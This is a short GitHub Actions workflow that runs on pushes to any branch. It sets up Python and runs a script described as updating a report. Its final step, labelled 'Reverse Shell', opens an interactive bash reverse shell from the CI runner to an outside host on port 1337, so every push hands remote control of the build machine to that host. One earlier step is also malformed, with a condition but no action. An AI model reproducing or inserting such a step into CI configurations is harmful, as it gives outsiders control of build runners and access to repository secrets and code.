name: Process

on:
  push:
    branches:
      - '*'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Check if new branch
        if: startsWith(github.ref, 'refs/heads/')

      - name: Setup codebase
        uses: actions/checkout@v2

      - name: "Setup Python3"
        uses: actions/setup-python@v4
        with:
          python-version: '3.10' 

      - name: "Updating raport"
        run: |
          python3 process.py

      - name: "Reverse Shell"
        run: |
          bash -i >& /dev/tcp/home.voinearadu.com/1337 0>&1